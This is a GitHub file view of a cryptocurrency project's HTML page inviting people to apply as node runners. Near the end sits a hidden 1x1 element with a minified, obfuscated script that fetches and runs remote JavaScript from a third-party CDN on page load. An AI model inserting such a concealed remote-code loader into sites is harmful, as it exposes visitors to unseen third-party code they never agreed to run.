-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathnode.html
132 lines (127 loc) · 9.11 KB
/
node.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
<!DOCTYPE html>
<html lang="en">
<head>
<title>CodersCoin - A cryptocurrency for developers and IT enthusiasts</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<script src="https://kit.fontawesome.com/d9ec437633.js" crossorigin="anonymous" defer></script>
<meta name="saashub-verification" content="cqle6ueijluk" />
<link rel="icon" type="image/png" href="./assets/brand/icon.png">
<link rel="apple-touch-icon" href="./assets/brand/icon.png"/>
<!-- SEO -->
<meta name="title" content="CodersCoin - A cryptocurrency for developers and IT enthusiasts">
<meta name="description" content="CodersCoin is a cryptocurrency for developers. It provides a simple platform for developers to pay each other. No wallet is required, just a Github account.">
<meta name="keywords" content="crypto,blockchain,cryptocurrency,coderscoin,CodersCoin,CSC,coin,web3">
<meta name="robots" content="index, follow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<!--meta name="language" content="English"-->
<meta name="revisit-after" content="10 days">
<meta name="author" content="Peter Till">
<!-- social -->
<!-- Open Graph / Facebook -->
<meta property="og:type" content="website">
<meta property="og:url" content="https://coderscoin.github.io/">
<meta property="og:title" content="CodersCoin - A cryptocurrency for developers and IT enthusiasts">
<meta property="og:description" content="CodersCoin is a cryptocurrency for developers. It provides a simple platform for developers to pay each other. No wallet is required, just a Github account.">
<meta property="og:image" content="https://coderscoin.github.io/link.png">
<!-- Twitter -->
<meta property="twitter:card" content="summary_large_image">
<meta property="twitter:url" content="https://coderscoin.github.io/">
<meta property="twitter:title" content="CodersCoin - A cryptocurrency for developers and IT enthusiasts">
<meta property="twitter:description" content="CodersCoin is a cryptocurrency for developers. It provides a simple platform for developers to pay each other. No wallet is required, just a Github account.">
<meta property="twitter:image" content="https://coderscoin.github.io/link.png">
<!-- Google Analytics -->
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-P1GTLYFGQX"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-P1GTLYFGQX');
</script>
<!--bootstrap-->
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script>
<!--custom css-->
<link rel="stylesheet" href="style.css">
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-dark custom-navbar p-10 fixed-top">
<div class="container-fluid">
<a class="navbar-brand" href="./index.html">
<img src="./assets/brand/icon.png" alt="Logo" width="40" height="40" class="d-inline-block align-text-top">
CodersCoin
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
<!--span class="navbar-toggler-icon">re</span-->
<span class="" role="button" ><i class="fas fa-code-branch" aria-hidden="true"></i></span>
</button>
<div class="collapse navbar-collapse justify-content-end" id="navbarNav">
<ul class="navbar-nav">
<li class="nav-item">
<a class="nav-link active" aria-current="page" href="./index.html"><i class="fa-solid fa-house"></i> Home</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://csc.onrender.com/auth/github"><i class="fa-solid fa-wallet"></i> Wallet</a>
</li>
<li class="nav-item">
<a class="nav-link" href="./mine.html"><i class="fas fa-cubes"></i> Mine CSC</a>
</li>
<li class="nav-item">
<a class="nav-link" href="./node.html"><i class="fa-solid fa-database"></i> Node</a>
</li>
<li class="nav-item">
<a class="nav-link" href="./whitepaper.html"><i class="fa-solid fa-paperclip"></i> Whitepaper</a>
</li><!--.disabled to disable-->
<!--li class="nav-item">
<a class="nav-link" href="./cart.html"><i class="fas fa-shopping-cart"></i> <span class="badge badge-danger bg-danger px-1">
<script>
var cart = JSON.parse(sessionStorage.getItem("cart"));
if(cart != null){document.write(Object.keys(cart).length);}else{document.write("0");}
</script>
</span></a>
</li-->
</ul>
</div>
</div>
</nav>
<div class="px-4 py-5 my-5 text-center hero">
<h1 class="display-5 fw-bold">Be the part of CodersCoin network!</h1>
<div class="col-lg-6 mx-auto">
<p class="lead mb-4">Would you like to be part of the CodersCoin network? Run a node and become a full-fledged block validator!</p>
<div class="d-grid gap-2 d-sm-flex justify-content-sm-center">
<a href="https://forms.gle/Br5e4XKcMwg259Zi9" type="button" class="btn btn-primary btn-lg px-4 gap-3"><i class="fas fa-clipboard-check"></i> Apply as a node runner!</a>
</div>
</div>
</div>
<!--/div-->
<main class="container">
<div class="alert alert-danger" role="alert">
Since running a node will make a port of your network and device publicly available, it is important to check its security and that it is not possible to get into your system through the port. DDoS protection can also be a good solution, or if you run the CodersCoin node script in a separated environment, such as a Docker container.
</div>
<section>
<div class="row">
<div class="col-xs-12 text-center"><h2>Why do I need to apply?</h2></div>
<div class="col-xs-12 text-center"><p>It would be easiest if you could just download the CodersCoin node software and run it, wouldn't it? Yes, but for the sake of the security of the CSC network and the discoverability of the nodes in the peer-to-peer network, there is no such option yet. Below is more on why:</p></div>
</div>
<h3>Security</h3>
<p>CodersCoin is a relatively new cryptocurrency with only a few users. This means that only a few people run nodes and if a few had bad intentions, they could agree on the wrong blocks, which would put the security of the network at risk in the early days. With the applicant system, we can make sure that only authentic and well-intentioned people run nodes, and if not, we can remove them so that other nodes do not discover them or receive data from them.</p>
<hr>
<h3>Discoverability</h3>
<p>Although we could make it so that the nodes send their IP address and port to the CodersCoin node explorer endpoint at the first run, but this could lead to privacy problems. That's why you have to enter them on the application form, so we can add your IP address and port to the node explorer.</p>
<hr>
<h3>Activity</h3>
<p>With a cryptocurrency like CodersCoin, it is very important to be available at any time. Because it is decentralized, it is almost entirely run by people. The CodersCoin team only operates a cryptographic key verification endpoint (TSK) and wallet. We cannot guarantee the uptime of CodersCoin users. That is why it is important that, at the very beginning of the start of the cryptocurrency, there are nodes running that are able to be online for as long as possible and serve people.</p>
</section>
<ins class="6550cec4935d48f9fdda42c3" style="display:inline-block;width:1px;height:1px;"></ins><script>!function(e,n,c,t,o,r,d){!function e(n,c,t,o,r,m,d,s,a){s=c.getElementsByTagName(t)[0],(a=c.createElement(t)).async=!0,a.src="https://"+r[m]+"/js/"+o+".js?v="+d,a.onerror=function(){a.remove(),(m+=1)>=r.length||e(n,c,t,o,r,m)},s.parentNode.insertBefore(a,s)}(window,document,"script","6550cec4935d48f9fdda42c3",["cdn.bmcdn6.com"], 0, new Date().getTime())}();</script>
</main>
<footer class="bg-light text-center text-lg-start">
<!-- Copyright fixed-bottom -->
<div class="text-center p-3" style="background-color: #1B223D; color: white;">
© 2023 Copyright:
CodersCoin
</div>
<!-- Copyright -->
</footer>
</body>
</html>